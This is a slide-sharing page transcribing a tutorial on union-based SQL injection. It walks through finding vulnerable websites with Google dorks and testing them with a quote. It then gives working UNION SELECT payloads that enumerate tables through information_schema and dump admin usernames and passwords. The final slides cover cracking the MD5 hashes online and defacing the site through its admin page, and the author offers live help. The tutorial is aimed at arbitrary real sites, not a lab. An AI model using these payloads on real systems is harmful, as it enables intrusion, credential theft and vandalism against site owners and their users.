Union based sql injection by Urdu Tutorials Point
Download as PPTX, PDF0 likes1,541 views
The document outlines a tutorial on manual SQL injection techniques, including using Google dorks to find vulnerable sites and checking their vulnerability with SQL queries. It explains how to identify the number of columns, find vulnerable columns, and extract database information such as usernames and passwords. Additionally, it provides instructions for defacing websites and mentions resources for decrypting hashed passwords.
Union based sql injection by Urdu Tutorials Point
- 1. Union Based SQL Injection The Basic & First Stage of Manual SQL Injection.
- 2. Finding Vulnerable Sites To Find Vulnerable Sites we use Google dorks. Index.php?id= (Example of Google Dork) Dorks???? Shared Along with this Tutorial.
- 3. Checking Vulnerability In order to check the vulnerability of site we add the single quote (‘) at the end of url & hit enter. Www.site.com/index.php?id=1’ if the page remains same it means it is not vuln, if it is showing any error which related to sql query, then it is vulnerable.
- 4. Finding Number of Columns To find number of column in site’s database we replace quote(‘) with order by n statement. Change the n from 1,2,3,4,……n Until you get the error like “Unknown Column” If you get Unknown column on 6 number then 5 columns are there in database of site.
- 5. Finding Vulnerable Column To find the vulnerable column we put (-) before ID number. Like index.php?id=-2 & also we replace order by statement with union select.After union select we type all the number of columns like site.com/index.php?id=-2 union select 1,2,3,4,5— After it we will get a bold number on page
- 6. Finding Version, DB & user Now in the last slide we found vulnerable column which was bold. To find version ,database or user we replace vulnerable column. Version() Database() User() if the above don’t work then user hex(@@version))
- 7. Finding Table Name To find table names user the following statements. Group_concat(table_name) information_schema.tables where table_schema=database()— Replace group_concat(table_name) with vulnerable column number. & type the second query after total column numbers like site.com/index.php?id=-2 union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--
- 8. Dumping Admin Table Group_concat(column_name) FROM information_schema.columns WHERE table_name=mysqlchar()— Download & install hackbar in Mozilla Firefox https://addons.mozilla.org/en- US/firefox/addon/3899 Select sql>Mysql>MysqlChar() Then a small window will open type admin table name like in mine case it is tbl_admin click ok. Copy & paste the Chars instead of mysqlchar()
- 9. Extracting Admin info After hitting enter you will see admin username,passsword,id,type & many more columns on the page. To Dump user name ,password replace group_concat(column_name) with group_concat(username,0x3a,password) Replace information_schema…. Balah blah with just simple from admin table name like index.php?id=-2 union select 1,2,3,4,group_concat(username,0x3a,passwor d),6 from tbl_admin--
- 10. Extra Guideline To deface site you should have to find admin page which will be like site.com/admin site.com/login.php etc etc Before this you should have to decrypt md5 hashed password with online sites like md5online.org
- 11. <3 Thanks for Watching I hope you have liked it I am Always Available for live help on team viewer please contact me in any issue Facebook.com/backk.sppac3 Facebook.com/UrduTutorialsPoint Stay Connected <3 for More Tutorials